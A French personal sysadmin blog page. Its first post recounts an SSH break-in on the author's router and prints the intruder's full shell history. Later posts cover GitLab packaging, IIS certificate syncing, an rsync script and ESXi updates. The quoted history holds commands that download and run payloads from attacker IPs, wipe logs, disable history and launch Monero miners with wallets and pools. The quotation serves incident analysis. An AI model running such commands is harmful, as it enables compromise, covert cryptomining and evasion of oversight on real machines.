Je me suis fait hack (encore)

Posted on 28 janvier 20182 commentaires

Me voilà de retour d’une très sympathique semaine de ski pour constater un peu par hasard et après une bonne nuit de sommeil une activité suspecte sur mon routeur, un hack ?

Un cafard se balade sur mon routeur

Que vois-je ? L’utilisateur build qui ouvre une connexion ssh en live ?! build est un compte que j’utilise pour build des packages pour Alpine Linux. Avant de me faire une vm dédiée à cette tâche, avec largement plus de capacité, c’est mon routeur (sous Alpine) qui s’occupait de la compilation. Le routeur est un bi-coeur faiblard cadencé à 1GHz épaulé par 4Go de RAM à comparer à une machine virtuelle armée de 8 vCPUs et de 8Go de RAM, ce n’est pas exactement la même chose sur les temps de compilation.

Si un gus a réussi à ssh mon routeur, c’est qu’il est exposé sur Internet, plutôt normal pour un routeur. Et comme je souhaite pouvoir m’y connecter à distance, SSH est accessible sur son port standard. Je suis absolument contre la sécurité par l’obscurantisme, dont l’analogie serait de cacher la clé sous le tapis. Je n’ai donc pas remappé le port 22 ailleurs. Quant au mot de passe de ce compte, ça devait très certainement être build aussi… Ca peut paraître stupide sauf que mes accès ssh ne sont pas censés accepter des logins par mot de passe. Enfin c’est ce que je croyais.

Désinfection au Raid⚡

# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication no

Après une vérification rapide de /etc/ssh/sshd_config , j’ai pu confirmer, et corriger, que sshd acceptait bien les logins par mot de passe. Je suppose que j’ai dû être un peu fatigué lorsque j’ai mis à jour sshd la dernière fois. Plus de fun que de mal, le petit malin aura tenté tout un tas de binaires pré-compilés pour escalader en privilèges ou faire miner ma box mais sans la glibc ni compilateurs, c’est un peu dur de les faire exécuter, sans compter grsec qui masque tous les process non-ownés en cours d’exécution et l’absence de sudo.

Ci-dessous l’activité de l’indésirable, on peut voir aux commandes employées et fautes de frappes que l’attaque était manuelle.

uname -a; w
w
ps x
wget
cat /etc/passwd |grep sh
ps x
cd /tmp/.ICE-unix ; wget http://14.142.118.25/psyBETA.gz; tar xvf psyBETA.gz; rm -rf psyBETA.gz; cd nsmail; mv psybnc sshd ; ./sshd
ps x
/sbin/ifconfig |grep inet
cd ..
rm -rf nsmail
ps x
kill -9 8042
cd var/tmp ; wget http://209.92.176.23:81/ipv6.tar ; tar zxvf ipv6.tar ; rm -rf ipv6.tar ;cd " " ; nano cfg
vi cfg
chmod +x *
./autorun
./run
cd ..
rm -rf " "
ls -a
ps x
history -c
exit
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 ;wget http://dl.packetstormsecurity.net/UNIX/penetration/log-wipers/mig-logcleaner11.tar.gz;tar xzvf mig-logcleaner11.tar.gz;cd mig-logcleaner;make linux ;./mig-logcleaner -u root;cd ..;rm -rf mig-logcleaner11.tar.gz;rm -rf mig-logcleaner
w
id
uname -a
ls -a
wget
perl
cd /tmp;wget http://107.180.41.26/bash/ce;perl ce;rm -rf ce
w
ls -a
wget bash.artisanal.gifts/ce
perl ce
rm -rf ce
w
ls -a
ssh nico@94.23.0.64
ssh root@213.32.95.88
ssh steam@149.202.41.147
ssh press@94.23.25.188
uname -a; w
ls -a
ps x
wget
ps x
cd /tmp/.ICE-unix
ls -a
cd /var/tmp
ls -a
cd nginx
ls -a
cd /tmp/.ICE-unix
wget http://14.142.118.25/psyBETA.gz; tar xvf psyBETA.gz; rm -rf psyBETA.gz; cd nsmail; mv psybnc sshd ; ./sshd
cd ..
rm -rf nsmail
wget http://14.142.118.25/mile.tgz
ls -a
tar zxvf mile.tgz
rm -rf mile.tgz
chmod +x *
./autorun
ls -a
cd .d
chmod +x *
./autorun
./run
cd ..
rm -rf .d
wget http://14.142.118.25/m.sh;chmod a+x m.sh && sh m.sh ; rm -rf m.sh ;history -rc
ls -a
exit
w
wget
cd /tmp;wget http://200.6.251.100/gx;perl gx;rm -rf gx
w
ls -a
w
id
uname -a
cat /proc/cpuinfo
passwd
cd /tmp;wget http://84.200.214.107/rx;perl rx;cd ; rm -rf .bash_history
w
?
help
setup-alpine
h
uname -a
w
uptime
passwd
cd /dev/shm
ls -al
wget
wget http://213.202.211.230/a
ls
perl a
cd /var/tmp
wget http://213.202.211.230/a
cd /tmp
wget http://213.202.211.230/a
perl a
wget http://213.202.211.230/frame.tgz
tar xvf frame.tgz
rm -rf frame.tgz
cd .w
./autorun & ./run
w
ps -x
uptime
sudo su -
unset HISTFILE HISTSAVE HISTLOG
passwd
ps x
cd /tmp
ls -al
cd .w
ls -al
cat cfg
ls
cd /tmp
ls
ls -al
wget 213.202.211.230/a
perl a
ls
cd /tmp
ls
wget 213.202.211.230/p
perl p
rm -rf p
ls
cd /tmp
ls
perl a
wget 213.202.211.230/noi.tgz
tar xvf noi.tgz
rm -rf noi.tgz
cd .r
./autorun & ./run
w
uptime
uname -a
ls
ls -al
cat .ash_history
wget 213.202.211.230/p
unset HISTFILE HISTSAVE HISTLOG
w
ps x
cat /proc/cpuinfo
wget 104.236.44.248/x;perl x;rm -rf x;wget http://195.114.1.39/~hoton/yam;chmod +x yam;./yam -c x -M stratum+tcp://46PncwHHbkcDv4X3PWbQataAK69Fq4oC9aDb5eZBDNsVSiEULJ4vCaRWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3z32jBJ:x@198.251.81.82:3333/xmr >>/dev/null &
unset HISTFILE HISTSAVE HISTLOG
cd /tmp
ls
ls -al
wget 213.202.211.230/p
perl p
unset HISTFILE HISTSAVE HISTLOG
ls
cd /tmp
ls
perl p
ps x
w
ps x
cat /roc/cpuinfo
cat /proc/cpuinfo
curl -O http://104.236.44.248/x;perl x;rm -rf x;wget http://104.236.44.248/xm.tgz;tar xzvf xm.tgz;rm -rf xm*;cd .g;chmod +x *;./a
rm -rf *
w
ps x
ls -a
wget http://162.243.108.174/n;perl n;rm -rf n;wget http://162.243.108.174/xm.tgz;tar xzvf xm.tgz;rm -rf xm.tgz;cd .g;./x
w
ps x
nproc
perl
cd /tmp;wget http://162.243.108.174/n;perl n;rm -rf n;
w
uname -a
ps x
cat /proc/cpuinfo
a
w
uname -a
gcc
cat /etc/passwd
cat /etc/issue
wget
cd /t,m
ls
cd /tmp/
ls
cd .ICE-unix/
ls
 wget prg.at.ua/bot/blackmech.tgz
 wget http://prg.at.ua/bot/blackmech.tgz
ls
tar xvzf blackmech.tgz
cd .black/
ls
./a
./r
ls
nano a
chmod +x a
./a
l
ls
./update
ls
cat update
ls -a
top
cd /home/build/.g
dir
./md -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u trendsalevip@gmail.com -p x >>/dev/null &
w
ps x
nproc
cat /proc/cpuinfo
nproc
ps x
cd /tmp
ls -a
cd .z
ls
ls -a
cd /dev/shm
ls -a
cd .ste
ls
cd .s
ls
wget http://162.243.108.174/e.tgz;tar xzvf e.tgz;rm -rf e.tgz;cd .e;./a;perl n;rm -rf n;history -c
cat run
 ./md -a cryptonight -o stratum+tcp://5.254.66.118:8888 -u etnjxvssgjZdK3LD9TBSecKST2ETHmVBw3azXtVXiQtggNDyAWEvzg9Ga29ZXM39Wd7kSJWDZUHTgYUMDKCwhPBE5zN5XHGSSB -p x >>/dev/null &
./yam32 -c t -M stratum+tcp://etnjxvssgjZdK3LD9TBSecKST2ETHmVBw3azXtVXiQtggNDyAWEvzg9Ga29ZXM39Wd7kSJWDZUHTgYUMDKCwhPBE5zN5XHGSSB:x@5.254.66.118:8888/xmr >>/dev/null &
ps x
rm -rf *
ps x
cd /tmp
ls
cat a
perl a
wget 213.202.211.230
ls
uname -a
uptime
w
wget
ls
cd mix
ls
chmod +x *
ls
./a 183.82
w
ls
cd mix
ls
./a
./a 92.222
ls
cat pass
halt
w
free -g
cat /proc/cpuinfo
apt-get
yum
cd /
ls -la
exit
w
cd
cd /
ls
ifconfig
free -g
sudo su
w
exit

Il aurait pu explorer mon réseau interne. En effet la présence de l’interface ppp0 avec la commande ifconfig indique assez clairement une connexion « perso » ou du moins signifiant un équipement pas installé en datacentre. J’en suis presque déçu. On peut même y lire de la frustration lorsqu’il tant vers la fin les commandes apt-get et yum . Rien que pour avoir pu déguster ce nectar, je ne regrette pas ma mauvaise configuration.

J’espère que ça t’aura amusé au moins autant qu’à moi. Je suis cependant preneur de tout moyen de tracer ce ~~connard~~ script-kiddie en obtenant son wallet ETH à partir des informations ci-dessus, je prends !

Et si tu veux jouer avec sa toolbox : 20180128_hack_tools.tar

Packager Gitlab

Posted on 23 décembre 2017Leave a comment

Pour diverses raisons, je vomis Debian, Ubuntu, CentOS et autres distributions populaires. Au contraire, je prends mon pied avec Gentoo, et plus récemment avec Alpine. Je ne m’étendrais pas plus que cela, ce sujet mérite à mon avis un poste dédié. La plupart du temps, je m’y retrouve mais pour GitLab, une aventure a commencé.

Il était une fois…

Pour l’historique, j’ai commencé avec SVN pour gérer mes sources et ceux de ma boîte. A cette époque là, il n’existait pas réellement d’alternative cloud, il fallait gérer soi-même l’hébergement, ce que j’ai fait naturellement.

Puis il y a eu des déplacements, l’impossibilité de fetcher le dépôt SVN sur le téléphone ou lorsque je n’étais pas sur mon poste de travail ou tout simplement le souhait de vouloir consulter une version spécifique du code sans devoir récupérer la copie à partir de mon poste. Pour rappel, contrairement à git ou mercurius, une copie de travail svn ne contient qu’une seule version (la base de travail) et les modifications en cours (les fichiers modifiés par rapport à la base). L’historique est consultable à travers un client svn mais est en réalité stocké sur un serveur svn. Un serveur « git » est un abus de langage au sens où git est un VCS décentralisé : la copie sur un serveur git contient autant d’information que la copie sur un poste de travail, autrement dit : il est possible de consulter tout l’historique d’un dépôt uniquement à partir d’une copie sur un poste de travail en déconnecté. C’est l’un des points forts de git, mais rend de fait les dépôts locaux assez fat. J’avais déjà mis en place redmine, un outil de gestion de projet relativement simple, pour la gestion des accès et il proposait un accès web aux dépôts. Ca a fait le taff durant plusieurs années.

Pendant ce temps, l’écosystème git se développe, github devient incontournable, des alternatives cloud apparaissent avec bitbucket, gitorius, gitlab, les outils permettant d’utiliser git sans prises de têtes deviennent assez matures, il est temps d’abandonner svn pour git, les avantages de git n’étant plus dans l’ombre de sa ligne de commande ô-combien puissante, mais horrible d’utilisation. Eventuellement nos projets passent sous git mais toujours sous gestion redmine.

En parallèle je fais une excursion professionnelle sous TFS 2010, le produit s’intégrant bien avec une gestion centralisé de la sécurité sous Active Directory. J’ai expérimenté TFS et son VCS propriétaire TFVC au travers d’un projet web. TFVC est une véritable horreur côté dev, chaque fichier modifié devant d’abord être marqué modifiable. TFS est en soit pas mal, mais TFVC ne figure pas dans ses points forts, étant en outre un VCS centralisé à l’instar de SVN.

Et un jour (automne 2016), Gitlab est arrivé sur la table. Un clone de github, que j’apprécie pour sa simplicité et la notion de merge-request, à installer chez soi (on-premise). Gitlab propose des packages d’installation pour les distributions usuelles mais rien pour Gentoo, si ce n’est l’installation from source. J’avoue ne pas être très surpris. J’y vais donc à suivre le tutoriel d’installation à partir des sources et, afin de contrôler les fichiers installés et faciliter les mises à jour, créer les ebuilds (packages Gentoo boites blanches).

Gitlab

Gitlab est un produit complexe. Chacun de ses composants a sa propre installation, qui fonctionne mais n’est pas clean d’un point de vue packaging (il n’y a pas de clean up des codes sources go après compilation par exemple, ce qui ne sert à rien au runtime). L’écriture des ebuilds est en soit un petit challenge, que je relève haut la main… jusqu’à ce que gitlab passe à ruby 2.3 à partir de leur mouture 9.x. Gentoo est encore à ce jour coincé en ruby 2.2. Impossible de mettre à jour Gitlab, je le laisse en état pendant plusieurs mois en attendant de trouver une solution qui m’éviterais d’installer un ruby 2.3 instable sous Gentoo.

Plusieurs mois plus tard je monte une plateforme Docker, pour l’instant standalone. Il est peut-être temps de voir s’il l’on peu dockeriser Gitlab. Gitlab propose sa propre image Docker officielle mais elle est basée sur Ubuntu (et pas la dernière) et comme dit au début, c’est à vomir. Rien que par la surcharge pondérale des images docker basées sur Ubuntu/Debian en comparaison de Alpine, surcharge qui ne les rendent même pas plus pratique à l’utilisation. Faite donc un less sur l’image Cassandra, Oops ya pas, on tente view alors, ah bah ça n’existe pas, et vi n’est pas non plus fournit. En 5MB, alpine fournit tout ça de base et plus. Je ne fais pas spécialement de pub pour Alpine mais il est difficile de ne pas s’énerver quand on se retrouve à poil à débugger une image fat et moisie.

Maîtrisant plutôt bien l’installation source de Gitlab ainsi que le packaging Alpine, je me lance dans la création d’une image Docker permettant de faire tourner une version à jour de Gitlab. Cela ma conduit à créer plusieurs packages intermédiaires, ruby2.3, yarn (node js), gitlab-shell, gitlab-gitaly. Après pas mal d’effort, j’arrive à avoir une image fonctionnelle en 10.2.5 ! Youpi !!

git-archive

Mais c’est aussi là que j’arrête l’image custo. Alors que l’image officielle de gitlab arrive à intégrer Gitlab et toutes ses dépendances et même plus (postgresql, redis, mattermost, prometheus), mon image ne contient que Gitlab et se prend 100Mo de plus, même en supprimant les packages non-nécessaires au runtime. Frustrant mais s’explique notamment par le manque d’instructions sur le clean, celles-ci étant décrites dans le cookbook ayant servi à concevoir l’image officielle. Mais je n’ai pas le courage de déchiffrer ce qu’à fait le chef.
J’ai mis beaucoup d’effort dans la conception de cette image Docker mais ce n’est pas assez pour qu’elle soit prod-ready, contrairement aux ebuilds Gentoo. Cette fois, j’abandonne, Ubuntu a gagné. J’ai converti la base de données mysql en postgresql pour pouvoir utiliser l’image officielle Docker et c’est dessus que je vais rester. Cette défaite va me permettre de me focus sur d’autres projets à hacker 🙂

Le travail n’aura pas été totalement vain. J’aurais appris au moins deux choses :

l’architecture de Gitlab
savoir sacrifier certaines choses pour pouvoir se concentrer sur d’autres

Sur cette fin, je félicite d’avance les acharnés qui m’auront lu jusqu’au bout :p

Synchroniser un certificat SSL avec reverse proxy et serveur IIS

Posted on 15 octobre 2017Leave a comment

Dans la continuation de mes articles sur Let’s Encrypt, voici un petit article permettant de résoudre un problème qui se pose lors de l’utilisation d’un reverse proxy.

Soit la situation suivante :

un serveur applicatif HTTPS utilisant le magasin de certificat de Windows, accédé en direct par les postes de travail internes
un reverse proxy HTTPS permettant d’accéder à ce serveur applicatif depuis Internet

On se retrouve alors avec potentiellement 2 serveurs HTTPS distinct donc deux certificats distincts. On pourrait les aligner, mais les certificats Let’s Encrypt ayant une durée de vie de 3 mois, la surcharge induite pour effectuer ce travail manuellement commence à peser, à moins d’automatiser cette opération avec un simple script.

Initialisation

La première fois est manuelle, et consiste à charger le certificat avec sa clé privée, donc obligatoirement sous forme PFX, depuis le reverse proxy vers le serveur applicatif. Cela va servir à charger la clé privée au niveau du serveur applicatif, opération qui ne sera pas faite ultérieurement, et donc simplifie la maintenance d’un point de vue de la sécurité. En effet il suffira par la suite de récupérer uniquement le certificat, donc la partie publique, ce qui se fait simplement en faisant une requête HTTPS au reverse proxy.

Récursion Répétition

Comme dit au premier paragraphe, la clé privée ne change pas, seul le certificat est renouvelé régulièrement auprès de Let’s Encrypt. Le script va donc :

Effectuer une requête HTTPS au reverse proxy, en spécifiant l’hôte permettant de sélectionner le bon site (via l’extension SNI)
La réponse, quelque soit le résultat HTTP (200, 404, 401…) contient le certificat, qu’on importe dans le magasin de certificat
Le magasin de certificat contient la clé privée, ajouté précédemment, et un certificat sans clé privée mais dont la clé publique correspond à la clé privée. On va exécuter un programme qui va permettre de réassocier ces deux éléments
La dernière étape consiste à reconfigurer IIS pour utiliser le nouveau certificat.

C’est l’objectif du script ci-dessous qui pourra être exécuté de manière périodique via le planificateur de tâches.

# url permettant d'atteindre le reverse proxy
# depuis le serveur applicatif
$address = 'https://rp-out.kveer.fr'
# nom d'hôte à envoyer au reverse proxy pour sélectionner le bon site
$headerHost = 'tfs.dev.kveer.fr'
# nom du site IIS devant utiliser le certificat
$site = 'Team Foundation Server'

$CertStore = 'cert:\LocalMachine\WebHosting'
Import-Module WebAdministration
$tmp = "$env:TEMP\_cert_import_" + (Get-Random) + ".crt"

$wr = [Net.WebRequest]::CreateHttp($address)
$wr.Host=$headerHost
$wr.AllowAutoRedirect=$false
try { $wr.GetResponse() } catch {}
$cert = $wr.ServicePoint.Certificate
$bytes = $cert.Export([Security.Cryptography.X509Certificates.X509ContentType]::Cert)
Set-Content -Value $bytes -Encoding Byte -Path $tmp
$c = Import-Certificate -CertStoreLocation $CertStore -FilePath $tmp
certutil -repairstore WebHosting $c.SerialNumber
Remove-Item $tmp

$currentSSLBinding = Get-Item IIS:\SslBindings\* | Where-Object { $_.Port -eq 443 -and $_.Sites -eq $site }
$currentSSLBindingName = $currentSSLBinding.PSChildName

$currentSSLBinding | Remove-Item
Get-Item -Path "$CertStore\$($c.Thumbprint)" | New-Item -Path IIS:\SslBindings\$currentSSLBindingName

Enjoy !

Synchronisation asymétrique entre deux dossiers distants

Posted on 1 mai 2017Leave a comment

J’ai écrit un (très) petit script qui me permet de synchroniser à sens unique deux dossiers distants.

Ce script s’exécute une fois par jour par cron. À chaque exécution, il va récupérer du dossier source tout ce qui aura été créé ou modifier depuis la dernière bonne exécution du script. Cette synchronisation asymétrique me permet de vider régulièrement le dossier local, qui est dans l’usage un tampon, sans que les éléments déplacés ne soient à nouveaux resynchronisés à partir du dossier distant.

#!/bin/sh
# remote mono-directional sync v2.2

# note: the first time this script runs, nothing append
# because the script initializes the last exec to now.

# configuration parameters
# remote folder to sync to (the source)
REMOTE_FOLDER='/remote/folder'
# remote host and username to id against
REMOTE_URI='remote-user@remote.kveer.fr'
# local folder (the destination)
LOCAL_URI='/mnt/pending'
# file containing the last sync date
LAST_EXECUTION='/var/lib/kveer/last-remote-user-sync'
# the ssh private key to ident to the remote host
REMOTE_KEY='rtorrent-sync-identity'

# private variables -- DO NOT MODIFY
TMP_FILES_TO_SYNC=$(mktemp -p /tmp rsync.XXXXXX)
LAST_EXECUTION_FOLDER=$(dirname $LAST_EXECUTION)
RSYNC_CMD="rsync -4 -htrvRc -z --partial --progress"

# beginning of the script
if [ ! -d `dirname $LAST_EXECUTION` ]; then
        mkdir `dirname $LAST_EXECUTION`
        date '+%Y-%m-%d %H:%M:%S' > $LAST_EXECUTION
fi

# initializing ssh-agent to connect to the remote
eval $(ssh-agent)
ssh-add remote-user-sync-identity

# cleanup
trap '[ -e /proc/$SSH_AGENT_PID ] && kill $SSH_AGENT_PID; [ -f "$TMP_FILES_TO_SYNC" ] && rm "$TMP_FILES_TO_SYNC"' 0 2 3 15

LAST_EXEC=$(cat $LAST_EXECUTION)
ssh "$REMOTE_URI" "cd ${REMOTE_FOLDER};find . -daystart -maxdepth 1 -mindepth 1 -newermt '$LAST_EXEC' -print" > $TMP_FILES_TO_SYNC
NEW_LAST_EXEC=$(date '+%Y-%m-%d %H:%M:%S')
$RSYNC_CMD --files-from=$TMP_FILES_TO_SYNC "${REMOTE_URI}:${REMOTE_FOLDER}" "$LOCAL_URI"
ret=$?

# store last execution
[ "$ret" -eq '0' ] && echo $NEW_LAST_EXEC > $LAST_EXECUTION

Analyser l’impact d’une mise à jour ESXi

Posted on 17 avril 2017Leave a comment

Lorsqu’on met à jour à la main un ESXi, il est possible d’analyser les paquets qui vont être installés, ceux qui vont être mis à jour, et ceux qui ne vont pas être touchés. On a alors une sortie qui ressemble à ça.

~ # esxcli software profile update --dry-run -p ESXi-5.1.0-20160504001-standard \
> -d https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml
Update Result
   Message: The update completed successfully, but the system needs to be rebooted for the changes to be effective.
   Reboot Required: true
   VIBs Installed: VMware_bootbank_ata-pata-amd_0.3.10-3vmw.510.0.0.799733, VMware_bootbank_ata-pata-atiixp_0.4.6-4vmw.510.0.0.799733, VMware_bootbank_ata-pata-cmd64x_0.2.5-3vmw.510.0.0.799733, VMware_bootbank_ata-pata-hpt3x2n_0.3.4-3vmw.510.0.0.799733, VMware_bootbank_ata-pata-pdc2027x_1.0-3vmw.510.0.0.799733, VMware_bootbank_ata-pata-serverworks_0.4.3-3vmw.510.0.0.799733, VMware_bootbank_ata-pata-sil680_0.4.8-3vmw.510.0.0.799733, VMware_bootbank_ata-pata-via_0.3.3-2vmw.510.0.0.799733, VMware_bootbank_block-cciss_3.6.14-10vmw.510.0.0.799733, VMware_bootbank_ehci-ehci-hcd_1.0-3vmw.510.0.0.799733, VMware_bootbank_esx-base_5.1.0-3.85.3872664, VMware_bootbank_esx-dvfilter-generic-fastpath_5.1.0-0.0.799733, VMware_bootbank_esx-tboot_5.1.0-2.23.1483097, VMware_bootbank_esx-xlibs_5.1.0-1.22.1472666, VMware_bootbank_esx-xserver_5.1.0-1.22.1472666, VMware_bootbank_ima-qla4xxx_2.01.31-1vmw.510.0.0.799733, VMware_bootbank_ipmi-ipmi-devintf_39.1-4vmw.510.0.0.799733, VMware_bootbank_ipmi-ipmi-msghandler_39.1-4vmw.510.0.0.799733, VMware_bootbank_ipmi-ipmi-si-drv_39.1-4vmw.510.1.12.1065491, VMware_bootbank_misc-cnic-register_1.1-1vmw.510.0.0.799733, VMware_bootbank_misc-drivers_5.1.0-3.55.2583090, VMware_bootbank_net-be2net_4.1.255.11-1vmw.510.0.0.799733, VMware_bootbank_net-bnx2_2.0.15g.v50.11-7vmw.510.1.12.1065491, VMware_bootbank_net-bnx2x_1.61.15.v50.3-1vmw.510.0.11.1063671, VMware_bootbank_net-cnic_1.10.2j.v50.7-3vmw.510.0.0.799733, VMware_bootbank_net-e1000_8.0.3.1-2vmw.510.1.16.1157734, VMware_bootbank_net-e1000e_1.1.2-3vmw.510.2.23.1483097, VMware_bootbank_net-enic_1.4.2.15a-1vmw.510.0.0.799733, VMware_bootbank_net-forcedeth_0.61-2vmw.510.0.0.799733, VMware_bootbank_net-igb_2.1.11.1-3vmw.510.1.12.1065491, VMware_bootbank_net-ixgbe_3.7.13.6iov-10vmw.510.1.20.1312873, VMware_bootbank_net-nx-nic_4.0.558-3vmw.510.0.0.799733, VMware_bootbank_net-r8168_8.013.00-3vmw.510.0.0.799733, VMware_bootbank_net-r8169_6.011.00-2vmw.510.0.0.799733, VMware_bootbank_net-s2io_2.1.4.13427-3vmw.510.0.0.799733, VMware_bootbank_net-sky2_1.20-2vmw.510.0.0.799733, VMware_bootbank_net-tg3_3.123b.v50.1-1vmw.510.2.23.1483097, VMware_bootbank_net-vmxnet3_1.1.3.0-3vmw.510.3.55.2583090, VMware_bootbank_ohci-usb-ohci_1.0-3vmw.510.0.0.799733, VMware_bootbank_sata-ahci_3.0-15vmw.510.2.23.1483097, VMware_bootbank_sata-ata-piix_2.12-7vmw.510.2.23.1483097, VMware_bootbank_sata-sata-nv_3.5-4vmw.510.0.0.799733, VMware_bootbank_sata-sata-promise_2.12-3vmw.510.0.0.799733, VMware_bootbank_sata-sata-sil24_1.1-1vmw.510.0.0.799733, VMware_bootbank_sata-sata-sil_2.3-4vmw.510.0.0.799733, VMware_bootbank_sata-sata-svw_2.3-3vmw.510.0.0.799733, VMware_bootbank_scsi-aacraid_1.1.5.1-9vmw.510.0.0.799733, VMware_bootbank_scsi-adp94xx_1.0.8.12-6vmw.510.0.0.799733, VMware_bootbank_scsi-aic79xx_3.1-5vmw.510.0.0.799733, VMware_bootbank_scsi-bnx2i_1.9.1d.v50.1-5vmw.510.0.0.799733, VMware_bootbank_scsi-fnic_1.5.0.3-1vmw.510.0.0.799733, VMware_bootbank_scsi-hpsa_5.0.0-21vmw.510.1.16.1157734, VMware_bootbank_scsi-ips_7.12.05-4vmw.510.0.0.799733, VMware_bootbank_scsi-lpfc820_8.2.3.1-127vmw.510.0.0.799733, VMware_bootbank_scsi-megaraid-mbox_2.20.5.1-6vmw.510.0.0.799733, VMware_bootbank_scsi-megaraid-sas_5.34-4vmw.510.3.50.2323236, VMware_bootbank_scsi-megaraid2_2.00.4-9vmw.510.0.0.799733, VMware_bootbank_scsi-mpt2sas_10.00.00.00-5vmw.510.2.44.2191751, VMware_bootbank_scsi-mptsas_4.23.01.00-6vmw.510.2.44.2191751, VMware_bootbank_scsi-mptspi_4.23.01.00-6vmw.510.2.44.2191751, VMware_bootbank_scsi-qla2xxx_902.k1.1-9vmw.510.0.0.799733, VMware_bootbank_scsi-qla4xxx_5.01.03.2-4vmw.510.0.0.799733, VMware_bootbank_scsi-rste_2.0.2.0088-1vmw.510.2.23.1483097, VMware_bootbank_uhci-usb-uhci_1.0-3vmw.510.0.0.799733
   VIBs Removed: VMware_bootbank_ata-pata-amd_0.3.10-3vmw.500.0.0.469512, VMware_bootbank_ata-pata-atiixp_0.4.6-3vmw.500.0.0.469512, VMware_bootbank_ata-pata-cmd64x_0.2.5-3vmw.500.0.0.469512, VMware_bootbank_ata-pata-hpt3x2n_0.3.4-3vmw.500.0.0.469512, VMware_bootbank_ata-pata-pdc2027x_1.0-3vmw.500.0.0.469512, VMware_bootbank_ata-pata-serverworks_0.4.3-3vmw.500.0.0.469512, VMware_bootbank_ata-pata-sil680_0.4.8-3vmw.500.0.0.469512, VMware_bootbank_ata-pata-via_0.3.3-2vmw.500.0.0.469512, VMware_bootbank_block-cciss_3.6.14-10vmw.500.0.0.469512, VMware_bootbank_ehci-ehci-hcd_1.0-3vmw.500.1.11.623860, VMware_bootbank_esx-base_5.0.0-3.90.3982828, VMware_bootbank_esx-tboot_5.0.0-2.26.914586, VMware_bootbank_ima-qla4xxx_2.01.07-1vmw.500.0.0.469512, VMware_bootbank_ipmi-ipmi-devintf_39.1-4vmw.500.0.0.469512, VMware_bootbank_ipmi-ipmi-msghandler_39.1-4vmw.500.0.0.469512, VMware_bootbank_ipmi-ipmi-si-drv_39.1-4vmw.500.2.26.914586, VMware_bootbank_misc-cnic-register_1.1-1vmw.500.0.0.469512, VMware_bootbank_misc-drivers_5.0.0-3.68.2509828, VMware_bootbank_net-be2net_4.0.88.0-1vmw.500.0.7.515841, VMware_bootbank_net-bnx2_2.0.15g.v50.11-5vmw.500.0.0.469512, VMware_bootbank_net-bnx2x_1.61.15.v50.1-2vmw.500.2.38.1311177, VMware_bootbank_net-cnic_1.10.2j.v50.7-2vmw.500.0.0.469512, VMware_bootbank_net-e1000_8.0.3.1-2vmw.500.2.35.1254542, VMware_bootbank_net-e1000e_1.1.2-3vmw.500.3.45.1489271, VMware_bootbank_net-enic_1.4.2.15a-1vmw.500.0.0.469512, VMware_bootbank_net-forcedeth_0.61-2vmw.500.0.0.469512, VMware_bootbank_net-igb_2.1.11.1-3vmw.500.2.26.914586, VMware_bootbank_net-ixgbe_2.0.84.8.2-11vmw.500.2.26.914586, VMware_bootbank_net-nx-nic_4.0.557-3vmw.500.1.11.623860, VMware_bootbank_net-r8168_8.013.00-3vmw.500.0.0.469512, VMware_bootbank_net-r8169_6.011.00-2vmw.500.0.0.469512, VMware_bootbank_net-s2io_2.1.4.13427-3vmw.500.0.0.469512, VMware_bootbank_net-sky2_1.20-2vmw.500.0.0.469512, VMware_bootbank_net-tg3_3.123b.v50.1-1vmw.500.2.26.914586, VMware_bootbank_ohci-usb-ohci_1.0-3vmw.500.0.0.469512, VMware_bootbank_sata-ahci_3.0-6vmw.500.1.11.623860, VMware_bootbank_sata-ata-piix_2.12-4vmw.500.1.11.623860, VMware_bootbank_sata-sata-nv_3.5-3vmw.500.0.0.469512, VMware_bootbank_sata-sata-promise_2.12-3vmw.500.0.0.469512, VMware_bootbank_sata-sata-sil_2.3-3vmw.500.0.0.469512, VMware_bootbank_sata-sata-svw_2.3-3vmw.500.0.0.469512, VMware_bootbank_scsi-aacraid_1.1.5.1-9vmw.500.1.11.623860, VMware_bootbank_scsi-adp94xx_1.0.8.12-6vmw.500.0.0.469512, VMware_bootbank_scsi-aic79xx_3.1-5vmw.500.0.0.469512, VMware_bootbank_scsi-bnx2i_1.9.1d.v50.1-3vmw.500.0.0.469512, VMware_bootbank_scsi-fnic_1.5.0.3-1vmw.500.0.0.469512, VMware_bootbank_scsi-hpsa_5.0.0-17vmw.500.3.41.1311175, VMware_bootbank_scsi-ips_7.12.05-4vmw.500.0.0.469512, VMware_bootbank_scsi-lpfc820_8.2.2.1-18vmw.500.2.26.914586, VMware_bootbank_scsi-megaraid-mbox_2.20.5.1-6vmw.500.0.0.469512, VMware_bootbank_scsi-megaraid-sas_5.34-1vmw.500.3.63.2312428, VMware_bootbank_scsi-megaraid2_2.00.4-9vmw.500.0.0.469512, VMware_bootbank_scsi-mpt2sas_06.00.00.00-6vmw.500.3.63.2312428, VMware_bootbank_scsi-mptsas_4.23.01.00-5vmw.500.3.63.2312428, VMware_bootbank_scsi-mptspi_4.23.01.00-5vmw.500.3.63.2312428, VMware_bootbank_scsi-qla2xxx_901.k1.1-14vmw.500.0.0.469512, VMware_bootbank_scsi-qla4xxx_5.01.03.2-3vmw.500.0.0.469512, VMware_bootbank_scsi-rste_2.0.2.0088-1vmw.500.3.45.1489271, VMware_bootbank_uhci-usb-uhci_1.0-3vmw.500.0.0.469512
   VIBs Skipped: VMware_locker_tools-light_5.1.0-3.85.3872664

Comme on peut le voir, il est difficile d’avoir une vue claire permettant de savoir quel paquet va être mis à jour et en quelle version. J’ai à ces fins écris un petit script en PowerShell permettant d’améliorer la lisibilité de la sortie.

$in='VIBs Installed: VMware_bootbank_ata-pata-amd_0.3.10-3vmw.510.0.0.799733, VMware_bootbank_[...]
   VIBs Removed: VMware_bootbank_ata-pata-amd_0.3.10-3vmw.500.0.0.469512, VMware_bootbank_ata-pata-[...]
   VIBs Skipped: VMware_locker_tools-light_5.1.0-3.85.3872664'

$split = $in.Split(@("`r`n"), [System.StringSplitOptions]::RemoveEmptyEntries).ForEach({ $_.Trim() })
$newPackages = $split.Where({ $_.StartsWith("VIBs Installed") }).Substring(16).Split(@(", "), [System.StringSplitOptions]::RemoveEmptyEntries)
$oldPackages = $split.Where({ $_.StartsWith("VIBs Removed") }).Substring(14).Split(@(", "), [System.StringSplitOptions]::RemoveEmptyEntries)
